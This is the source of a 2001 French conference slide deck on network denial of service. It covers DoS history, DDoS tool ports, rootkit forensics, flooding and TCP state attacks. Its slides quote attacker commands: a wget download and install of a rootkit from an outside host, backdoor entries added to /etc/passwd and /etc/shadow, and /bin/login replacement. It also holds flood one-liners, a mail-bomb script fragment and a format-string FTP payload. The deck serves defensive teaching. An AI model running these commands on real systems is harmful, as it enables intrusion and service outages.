%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% Présentation "Les dénis de service réseau" %%% 2001 (c) Stéphane Aubert - Hervé Schauer Consultants %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %deffont "standard" tfont "comic.ttf" %deffont "thick" tfont "arialb.ttf" %deffont "typewriter" xfont "courier new-bold-r", tfont "cour.ttf" %deffont "type2writer" xfont "arial narrow-bold-r" %deffont "def" tfont "comic.ttf", size 5, fore "lemon chiffon", vgap 40, prefix " " %deffont "code" tfont "courbd.ttf", size 3, fore "green", prefix " " %deffont "warn" tfont "verdana.ttf", fore "red", center, size 6 %default 1 area 90 90, leftfill, size 2, fore "gold", back "black", font "thick" %default 1 back "black" %default 2 size 7, vgap 10, prefix " " %default 3 size 2, bar "brown" 3, vgap 30, right, prefix "Stephane Aubert (c) Herve Schauer Consultants - 2001" %default 4 left, size 5, fore "lemon chiffon", vgap 40, prefix " ", font "standard" %tab 1 size 4, fore "lemon chiffon", vgap 40, prefix " ", icon arc "tomato" 40 %tab 2 size 4, fore "gold", vgap 20, prefix " ", icon delta3 "tomato" 40 %tab 3 size 3, fore "grey", vgap 20, prefix " ", icon box "grey" 40 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page %nodefault %size 7, font "standard", fore "white", back "black" %vgap 30 %xsystem "pipes -geometry %100x30" %center, size 9 Les dénis de service réseau - JRES 2001 - %center, size 5, font "thick", fore "gold" Stéphane Aubert %fore "grey", size 3 %fore "gold", size 5 Hervé Schauer Consultants %fore "grey", size 3 %%%center, image "test.jpg" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Plan %vgap 1 %icon box "blue" 30 Introduction %icon box "blue" 30 Petit historique des DOS %icon box "blue" 30 Présentation de DDOS (DOS répartis) %icon box "blue" 30 Piratage de masse et RootKits %icon box "blue" 30 Flooding (inondation de paquets) %icon box "blue" 30 Dernières 
attaques contre TCP %icon box "blue" 30 Quelques éléments de réponse %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dénis de service Définitions (Petit Larousse 2000) : Déni : refus d'accorder ce qui est dû. Dénier : refuser absolument d'accorder. Pré-requis : IP - RFC 791 ICMP - RFC 777 TCP - RFC 793 UDP - RFC 768 Liens : Base de DOS : http://www.attrition.org/security/denial/ DDOS Dave : http://staff.washington.edu/dittrich/misc/ddos/ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Nuke - Avril 1992 icmp_unreach Octopus - Janvier 1996 while - connect Ping Of Death - Décembre 1996 AIX, Digital Unix, Linux, BSDi, OSF, SCO Exemple : ping -l 65510 linuxbox WinNuke - Juillet 1997 blue screen of death ou reboot Win95/NT "Out of Band" sur le port 139/tcp avec le bit URG et un mauvais pointeur d'urgence Smurf / Smurf pour bsd - Juillet 1997 Inondation de paquets http://www.quadrunner.com/~c-huegen/smurf.txt %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Jolt / Sping - Octobre 1997 multiple ping-of-death Land - Octobre 1997 Affecte Windows 95(OSR2), Windows NT 4.0, FreeBSD, HP-UX, OpenBSD, SunOS, IOS, ... Latierra - Octobre 1997 Plante Windows 95 et occupe 100% du CPU sur Windows NT 4.0sp3 Teardrop / Overdrop - Décembre 1997 Plante Linux (jusqu'au kernel 2.0.31), NT, 95(OSR) Bonk - Janvier 1998 Plante Win95(OSR2) patché et NT 4.0 Teardrop modifié avec frag_offset > header_length %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Newtear - Janvier 1998 Affecte NT4 patché et Win95 Boink - Janvier 1998 Bonk modifié Fraggle - Mars 1998 Inondation de paquets Variante de Smurf en UDP Nestea / Nestea2 - Avril 1998 Plante linux 2.0.* et 2.1.* et certains Windows Syndrop - Juin 1998 teardrop mais en tcp avec le bit syn et des champs invalides (numéro de séquence, taille de fenêtre, ...) 
"freeze" NT4sp3 Un de mes préférés :) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Historique Targa - Juin 1998 bonk / jolt / land / nestea / newtear / syndrop / teardrop / winnuke Snork - Septembre 1998 Tueur de Windows NT Envoi de paquet RPC (135/udp) de la part d'un autre NT Smack - Octobre 1998 Inondation de paquets icmp-unreachable aléatoires Bloque Windows, *bsd, Redhat, Slackware, ... Stream / Raped - Janvier 2000 Inondation de ACK avec adresses/numéros de séquence aléatoires Jolt2.c - Mai 2000 Bloque Firewall-1 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS (Distributed Denial of Service) %font "code", size 3 +--------+ +--------+ | client | | client | +--------+ +--------+ | | --+------+-------------+--------+---------+-- | | | +-----------+ +-----------+ +-----------+ | handler | | handler | | handler | +-----------+ +-----------+ +-----------+ | | | ---+------+-----+------------+-+----------+-------+----+-- | | | | | +-------+ +-------+ +-------+ +-------+ +-------+ | agent | | agent | | agent | | agent | | agent | +-------+ +-------+ +-------+ +-------+ +-------+ \\\ /// \\ //// \\\\ /// \\\ /// \\ //// \\\\ /// +-----------+ +-----------+ +-----------+ | broadcast | | broadcast | | broadcast | +-----------+ +-----------+ +-----------+ \\\ |||| /// \\\ vvvv /// \\\ +--------+ /// --> | Victim |<---- +--------+ %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Trinoo client -> handler(s): 27665/tcp handler -> agent(s): 27444/udp agent -> handler(s): 31335/udp Attaques Syn flood Icmp flood %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS TFN (Tribe Flood Network) client -> handler : de type shell sur un port tcp sur un port udp sur icmp (comme loki) telnet ssh handler -> agent: paquets icmp echo-reply Attaques UDP flood SYN flood ICMP flood Smurf 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS TFN2K client -> handler : comme TFN handler -> agent : via TCP, UDP, ICMP, ou les 3 de manière aléatoire Attaques UDP flood SYN flood ICMP flood Smurf %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Stacheldraht client -> handler(s): 16660/tcp handler <-> agent(s): 65000/tcp, icmp-echo-reply Attaques ICMP flood SYN flood UDP flood Smurf %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Shaft client -> handler(s): 20432/tcp handler -> agent(s): 18753/udp agent -> handler(s): 20433/udp Attaques ICMP flood SYN flood UDP flood %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page DDOS Mstream client -> handler(s): 6723/tcp 15104/tcp 12754/tcp agent -> handler(s): 9325/udp 6838/udp handler -> agent(s): 7983/udp 10498/udp Attaques stream (ack flood) Autres DDOS trinity v3 (controle via irc et icq), omega, flitz, ... %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Script de masse (Mass-Hack) Que cherchent ils ? les ports 98/tcp ;-) services rpc statd, cmsd, ttdbserverd, automountd les serveurs FTP msadcs.dll, unicode Comment ? http://packetstorm.decepticons.org/UNIX/scanners/cracker.tgz %font "code" #!/bin/sh echo "scanning $1 for open boxes" ./z0ne $1 >$1.hosts echo "done whoring hosts.. 
running strobe" ./strobe -i $1.hosts -p 111 -n 900 -o $1.temp echo "second pass complete now running em through mountd scanner" ./i.pl $1.temp echo "alldone" %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Script de masse luckgo : le script principal ./luckgo 12 20 pour lancer le scan sur la plage 12.20/16 (AT&T) pour trouver les ports 111/tcp ouverts luckscan-a : le scanner de classe A, B ou C provient de pscan-a à chaque port ouvert lance l'exploit luckstatdx luckstatdx : statd exploit provient de statdx publié dans Bugtraq exploite un format-string-bug dans rpc.statd sur redhat 6.x exécute : %font "code" cd /;uname -a; id wget -nd http://www.becys.org/xzibit.tar.gz tar -zxvf xzibit.tar.gz cd lamerk; ./install cd /; rm -rf lamerk xzibit.tar.gz %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Attaque massive (exemple) obtention d'un shell garder le shell %font "code" uname -a; pwd; who echo "xxx:xxx:xxx:xxx:::/bin/sh" >> /etc/passwd echo "xxx:xxx:xxx:xxx:xxx:xxx:::" >> /etc/shadow cd /tmp gcc xxx.c -o xxx cp /bin/login /bin/xcat cp xxx /bin/login rm xxx xxx.c %font "def" obtenir des outils %font "code" wget http://packetstorm.decepticons.org/opensec-exploits/ exploits/solaris/solaris7/automountd.tar.gz wget xxx.yyy.zzz/amdex.tgz gunzip amdex.tgz tar -xvf amdex.tar rm -rf amdex.tar %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Attaque massive (exemple) utiliser les outils %font "code" ./ps xxx 98 %fore "grey" $ strings ps | grep remotes echo "%s" >> ./remotes %fore "green" ./vuln remotes %fore "grey" $ strings vuln| egrep -i '(pro|wu)' Vulnerable FTP(pro) - %s Vulnerable FTP(wu) - %s:no directories ;( Vulnerable FTP(wu) - %s:%s Vulnerable FTP(wu) - %s:/%s wu-2.4.2-academ[BETA-18](1) ProFTPD 1.2.0pre3 ProFTPD 1.2.0pre2 ProFTPD 1.2.0pre1 %fore "green" ./amdexa xxx.yyy.zzz.ttt etc. 
%font "def" patcher %font "code" wget ftp://updates.redhat.com/6.0/i386/ am-utils-6.0.1s11-1.6.0.i386.rpm rpm -Uvh am-utils-6.0.1s11-1.6.0.i386.rpm & rm -rf am-utils-6.0.1s11-1.6.0.i386.rpm %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Les rootkits Exemples : t0rn kit knark, adore, all-root, rial lrk3, lrk4, lrk5, lrk6 Solaris rootkit FreeBSD rootkit Ambient's Rootkit for Linux (ARK) Ramen, Lion Worm. rh[67]-shaper, RSHA, Romanian rootkit, RK17, ... %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit http://packetstorm.decepticons.org/UNIX/penetration/rootkits/tk.tgz Quelques fichiers modifiés %font "code" -rwxr-xr-x 1 root root 22460 Mar 8 2000 /usr/bin/du -rwxr-xr-x 1 root root 57452 Feb 2 2000 /usr/bin/find -rwxr-xr-x 1 root root 32728 Mar 7 2000 /sbin/ifconfig -rwxr-xr-x 1 root root 6408 Feb 11 2000 /usr/sbin/in.fingerd -r-sr-xr-x 1 root root 20452 Feb 26 04:01 /bin/login -rwxr-xr-x 1 root root 39484 Mar 8 2000 /bin/ls -rwxr-xr-x 1 root root 53364 Mar 7 2000 /bin/netstat -rwxr-xr-x 1 root root 31336 Feb 26 12:07 /bin/ps -rwxr-xr-x 1 root root 266140 Mar 7 2000 /usr/bin/top %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit certains fichiers de torn %font "code", size 2 -rw-r--r-- 1 root ftp 28 Feb 26 04:01 /etc/ttyhash -rw-r--r-- 1 root ftp 27 Feb 26 04:01 /usr/src/.puta/.1addr -rw-r--r-- 1 root ftp 72 Feb 26 04:01 /usr/src/.puta/.1file -rw-r--r-- 1 root ftp 21 Feb 26 04:01 /usr/src/.puta/.1logz -rw-r--r-- 1 root ftp 38 Feb 26 04:01 /usr/src/.puta/.1proc -rwxr-xr-x 1 root root 6948 Aug 23 2000 /usr/src/.puta/t0rns -rwxr-xr-x 1 root root 7578 Aug 21 2000 /usr/src/.puta/t0rnp -rwxr-xr-x 1 root root 1345 Sep 9 1999 /usr/src/.puta/t0rnsb -rw-r--r-- 1 root ftp 609461 Feb 27 18:31 /usr/src/.puta/system -rw-r--r-- 1 root bin 2125 Feb 25 23:11 /usr/src/.puta/bc.c drwxrwxr-x 2 1000 1000 4096 Feb 27 13:30 /usr/src/.puta/grabbb -rw-r--r-- 1 root bin 
6379 Dec 31 1999 /usr/src/.puta/grabbb-0.1.0.tar.gz drwx------ 3 1001 1001 4096 Feb 27 00:06 /usr/src/.puta/nmap-1.49 -rw-r--r-- 1 root bin 219155 Aug 16 1999 /usr/src/.puta/nmap.1.49.tar.gz -rwxr-xr-x 1 root bin 22850 Feb 26 23:35 /usr/src/.puta/smurf5 -rw-r--r-- 1 root ftp 499 Feb 26 04:01 /usr/info/.t0rn/shdcf -rwxr-xr-x 1 root root 524 Mar 13 2000 /usr/info/.t0rn/shhk -rwxr-xr-x 1 root root 328 Mar 13 2000 /usr/info/.t0rn/shhk.pub -rwxr-xr-x 1 root root 512 Mar 1 10:15 /usr/info/.t0rn/shrs %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit fichier du pirate dans /var/tmp/ %font "code" -rw-r--r-- 1 root bin 730 Feb 28 17:13 b -rw-r--r-- 1 root root 3350 Feb 27 15:38 bc.c -rw-r--r-- 1 root root 1736235 Feb 27 17:36 bccccc -rw------- 1 root root 798720 Feb 27 21:43 core drwxrwxr-x 2 1000 1000 1024 Feb 28 11:42 grabbb -rw-r--r-- 1 root root 6379 Feb 28 11:42 grabbb-0.1.0.tar.gz -rwxr-xr-x 1 root bin 22849 Feb 27 10:19 smurf5 -rw-r--r-- 1 root root 50792 Feb 28 11:46 wuftpd2600.c %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit backdoor Les lignes suivantes sont ajoutées à la fin du fichier /etc/rc.sysinit # Name Server Cache Daemon.. /usr/sbin/nscd -q nscd est ici un serveur SSHD. Ce serveur sshd utilisait le port 48863/tcp. L'accès root est autorisé :) ainsi que le forwarding X11. %font "code" Port 48863 ListenAddress 0.0.0.0 HostKey /usr/info/.t0rn/shhk RandomSeed /usr/info/.t0rn/shrs ... 
%font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rn Sniffer le fichier t0rns est un sniffer (linsniff 0.666) Le sniffer a capturé une autre attaque par format-string sur ce serveur %font "code", size 2 ============================================================ Time: Mon Feb 26 19:32:53 Size: 1941 Path: xxx.yyy.zzz.ttt => [rooted-linux-box] [21] ------------------------------------------------------------ [p[e[fa[faUSER ftp[fPASS mozilla@[fSITE EXEC %020d|%.f%.f|[1f[TfSITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f %.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f% .f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page T0rnkit Divers les fichiers bc* contiennent plus de 246 574 adresses de broadcast fichier core présent, créé par la commande ping ping -f 206.252.192.195 -s 650000 Cette adresse correspond au serveur : irc.stealth.net. grabbb -a xxx.yyy.0.0 -b xxx.yyy.255.255 21 scnanned scnanned contient les bannières de 1349 serveurs FTP dans la classe B xxx.yyy. %font "code" xxx.yyy.zzz.ttt:21: 220 XXXXXXX FTP server (Version wu-2.6.0(1) xxx.yyy.zzz.ttt:21: 220 XXXXXXX Microsoft FTP Service (Version 4.0). 
xxx.yyy.zzz.ttt:21: 220 XXXXXXX FTP server (Version wu-2.5.0(1) %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Plan %vgap 1 %icon box "blue" 30, fore "grey25" Introduction %icon box "blue" 30 Petit historique des DOS %icon box "blue" 30 Présentation de DDOS (DOS répartis) %icon box "blue" 30 Piratage de masse et RootKits %icon box "blue" 30, fore "white" Flooding (inondation de paquets) %icon box "blue" 30 Dernières attaques contre TCP %icon box "blue" 30 Quelques éléments de réponse %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le "flooding" C'est l'inondation. Avec quoi ? des paquets ICMP ou UDP ou IGMP ou ... des connexions TCP des paquets IP aléatoires des fragments des mails (mail-bombing) des requêtes DNS etc. etc. etc. Est-ce difficile à mettre en oeuvre ? %font "code" ping -f -s while : ; do telnet & done %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le "flooding" Mail bombing exemple : anonbomb.pl %font "code", size 2 @re = ("","","","","","","Re: ","Re: ","Re: ","Fw: ","Ad: ","Fwd: "); @sub2 = ("","Information","Info","Hello","Hi","Hiya","Yo","Registration", "Registering","Order","Ordering","Oi","Idea","Idea!","ISP","Internet Access", "Payment","Credit-Card","admin","Winning","Winnings","Compo","Competiton", "Howdy","Stuff","Fault","Faulty Order","Root","Hacking","Internet Abuse", "Mail Servers","Mailbombing....","Mailbomb","Help!","I'm Stuck","Computer Games", "Free Computer Games","Free Internet Access","0800","France","Holiday","French", ... $rep = $re[rand(@re)]; $subj1 = $sub1[rand(@sub1)]; $subj2 = $sub2[rand(@sub2)]; $subject = $rep . $subj1 . 
$subj2; $smtp -> mail($ENV{USER}); $smtp -> to ($to); $smtp -> data(); $smtp -> datasend("From: $from2 ($from)\n"); $smtp -> datasend("Reply-To: $from2\n"); $smtp -> datasend("To: $to (Mailing List Entry\: $key)\n"); $smtp -> datasend("Subject: $subject\n"); $smtp -> datasend("Date: Wed, 1 Jan 2039 00:00:01 -0000\n"); %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Le "flooding" Smurf %font "code" +---------+ | agent | +---------+ %fore "yellow" ICMP | %cont, fore "green" | %fore "yellow" from: victime | %cont, fore "green" | %fore "yellow" to: broadcast | %cont, fore "green" | %cont, fore "green" +---------+ %fore "yellow" | %cont,fore "green" | %cont,fore "red" +--------------> %cont,fore "green" | victime | %fore "yellow" | %cont,fore "green" | %cont,fore "red" | N fois %cont,fore "green" +---------+ +---------+ | routeur | +---------+ %fore "yellow" | %cont,fore "green" | %cont,fore "red" | %fore "yellow" v %cont,fore "green" | %cont,fore "red" ^ %fore "green" +------+-- %cont, fore "red" | %cont, fore "green" ---------+-------------------+ | %cont, fore "red" | %cont, fore "green" | | | %cont, fore "red" +------+------------+------------+ %cont, fore "green" | | %cont, fore "red" | %cont, fore "green" | %cont, fore "red" | | %cont, fore "green" | %fore "green" +-----------+ +-----------+ +-----------+ | machine | | machine | | machine | +-----------+ +-----------+ +-----------+ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Flooding (exemples d'outils) Smurf papasmurf.c IP-bomber ipbomb targa3 isic ACK-storm Stream2 1 SYN + ACK-storm SYN-flood Neptune (Phrack48-13 - route - Juin 1996) le premier (?) 
Orgasm Scan de port + SYN-flood sur les ports ouverts synk4 il marche bien synk5 vu sur des machines piratées %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Flooding (exemples d'outils) DNS-flood ddnsf Sur différentes machines : ./DDNSF_server & Sur un client : ./DDNSF_client start zombie.txt Résultat : Plusieurs :) requêtes DNS incorrectes depuis des adresses IP usurpées. Contre les IDS IDSwakeup 82 000 alertes générées dans ISS RealSecure (IDnet) Envoie des fausses attaques avec des TTL courts. stick Lecture des fichiers de configuration de SNORT Etc. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Les anciens outils paralyze3 connect() flood : état ESTABLISHED synk4 SYN flood : état SYN_RCVD Les nouveaux outils 3wahas de Teso (http://teso.scene.at/) le premier (?), écrit sur le ccc camp '99 (syn syn|ack ack) flood pour passer outre les syn-cookies netkill (Stanislav Shalunov - shalunov@att.com) (syn syn|ack ack) + HTTP get + fermer le descripteur de fichier naptha (Robert Keyes - Bindview - 30 nov. 2000) principalement (syn syn|ack fin|ack) avec de faux paquets ARP shutup.pl / just_shutup.pl /shutup.c (Stéphane Aubert - HSC) utilise un filtre IP (ipfilter, ipchains, ...) et différents modes combinables : (syn syn|ack ack) (syn syn|ack fin|ack) (syn syn|ack ack psh|ack) (syn syn|ack ack fin|ack) Option TTL court (pour filtre et firewall) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP %font "code", size 2 %fore "yellow" RFC 793 - TCP Connection State Diagram - Figure 6. 
%fore "green" +---------+ ---------\ active OPEN | CLOSED | \ ----------- +---------+<---------\ \ create TCB | ^ \ \ snd SYN passive OPEN | | CLOSE \ \ ------------ | | ---------- \ \ create TCB | | delete TCB \ \ %cont, fore "cyan", size 2 Normal : %fore "green", size 2 V | \ \ +---------+ CLOSE | \ %cont, fore "cyan", size 2 Client ------[ SYN ]-----> Serveur %fore "green", size 2 | LISTEN | ---------- | | +---------+ delete TCB | | %cont, fore "cyan", size 2 Client <---[ SYN|ACK ]---- Serveur %fore "green", size 2 rcv SYN | | SEND | | ----------- | | ------- | V %cont, fore "cyan", size 2 Client ------[ ACK ]-----> Serveur %fore "green", size 2 +---------+ snd SYN,ACK / \ snd SYN +---------+ | |<----------------- ------------------>| | %cont, fore "red", size 2 Naptha : %fore "green", size 2 | SYN | rcv SYN | SYN | | RCVD |<-----------------------------------------------| SENT | %cont, fore "red", size 2 Client ------[ SYN ]-----> Serveur %fore "green", size 2 | | snd ACK | | | |------------------ -------------------| | %cont, fore "red", size 2 Client <---[ SYN|ACK ]---- Serveur %fore "green", size 2 +---------+ rcv ACK of SYN \ / rcv SYN,ACK +---------+ | -------------- | | ----------- %cont, fore "red", size 2 Client ----[ FIN|ACK ]---> Serveur %fore "green", size 2 | x | | snd ACK | V V | CLOSE +---------+ | ------- | ESTAB | | snd FIN +---------+ | CLOSE | | rcv FIN V ------- | | ------- +---------+ snd FIN / \ snd ACK +---------+ | FIN |<----------------- ------------------>| CLOSE | | WAIT-1 |------------------ | WAIT | +---------+ rcv FIN \ +---------+ | rcv ACK of FIN ------- | CLOSE | | -------------- snd ACK | ------- | V x V snd FIN V +---------+ +---------+ +---------+ |FINWAIT-2| | CLOSING | | LAST-ACK| +---------+ +---------+ +---------+ | rcv ACK of FIN | rcv ACK of FIN | | rcv FIN -------------- | Timeout=2MSL -------------- | | ------- x V ------------ x V \ snd ACK +---------+delete TCB +---------+ ------------------------>|TIME 
WAIT|------------------>| CLOSED | +---------+ +---------+ %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Présentation de tcp RFC 793 Stevens - Volume 1 Comment cela fonctionne ? Stevens - Volume 2 less /usr/src/sys/netinet/tcp_input.c Exemple : %font "code" /* * Ack processing. */ switch (tp->t_state) { /* * In SYN_RECEIVED state if the ack ACKs our SYN then enter * ESTABLISHED state and continue processing, otherwise * send an RST. */ case TCPS_SYN_RECEIVED: if (SEQ_GT(tp->snd_una, th->th_ack) || SEQ_GT(th->th_ack, tp->snd_max)) goto dropwithreset; tcpstat.tcps_connects++; soisconnected(so); tcp_established(tp); %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Exemples d'utilisation de Shutup v0.5 shutup -d -p %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client --------[ ACK ]-------> Victime %font "def" shutup -d -p -n %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client ------[ FIN|ACK ]-----> Victime %font "def" shutup -d -p -f %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client --------[ ACK ]-------> Victime Client ------[ FIN|ACK ]-----> Victime %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Exemples d'utilisation de Shutup v0.5 shutup -d -p -b %font "code" Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client --------[ ACK ]-------> Victime Client --------[ SYN ]-------> Victime Client <-----[ SYN|ACK ]------ Victime Client ------[ FIN|ACK ]-----> Victime %font "def" shutup -d -p -t %font "code" Client --------[ SYN ]-------------> Victime Client <-----[ SYN|ACK ]------------ Victime Client --------[ ACK ]------->| Victime | TTL court %font "def" 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Exemples réels d'utilisation de Shutup v0.5 %font "code", size 2 # ./shutup -d groar -p 80 -b -f --== shutup v0.5 - sa/hsc ==-- == target: groar [192.70.106.66] == interface: ep0 == local ip: 192.70.106.82 08:42:02.270273 [SA] 192.70.106.66:80 -> 192.70.106.82:42317 ==> Ack + Fin|Ack 08:42:02.270337 [SA] 192.70.106.66:80 -> 192.70.106.82:63231 ==> Fin|Ack 08:42:02.270399 [SA] 192.70.106.66:80 -> 192.70.106.82:44523 ==> Ack + Fin|Ack 08:42:02.270459 [SA] 192.70.106.66:80 -> 192.70.106.82:16845 ==> Fin|Ack 08:42:02.270522 [SA] 192.70.106.66:80 -> 192.70.106.82:5208 ==> Ack + Fin|Ack 08:42:02.270597 [SA] 192.70.106.66:80 -> 192.70.106.82:23311 ==> Fin|Ack 08:42:02.270658 [SA] 192.70.106.66:80 -> 192.70.106.82:4306 ==> Ack + Fin|Ack Ou encore : 09:06:12.700343 [SA] 192.70.106.66:80 -> 192.70.106.82:26231 ==> Ack 09:06:12.710345 [SA] 192.70.106.66:80 -> 192.70.106.82:37729 ==> Ack 09:06:12.720341 [SA] 192.70.106.66:80 -> 192.70.106.82:1983 ==> Ack 09:06:12.730342 [SA] 192.70.106.66:80 -> 192.70.106.82:35187 ==> Ack 09:06:12.740337 [SA] 192.70.106.66:80 -> 192.70.106.82:49277 ==> Ack 09:06:12.750346 [SA] 192.70.106.66:80 -> 192.70.106.82:33695 ==> Ack %font "def" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Dernières attaques contre TCP Contre linux 2.2.17 %font "code" LAST_ACK SYN_RECV -------- -------- Jusque-là tout va bien : Tue Mar 20 11:48:22 CET 2001 17326 2 Tue Mar 20 11:48:36 CET 2001 17816 2 Tue Mar 20 11:48:49 CET 2001 18195 124 Tue Mar 20 11:49:04 CET 2001 18382 127 À partir de là, rien ne va plus : Tue Mar 20 11:49:19 CET 2001 18401 129 Tue Mar 20 11:49:33 CET 2001 18401 129 # ssh ducamp@itesec socket: No buffer space available socket: No buffer space available socket: No buffer space available socket: No buffer space available Secure connection to itesec refused. 
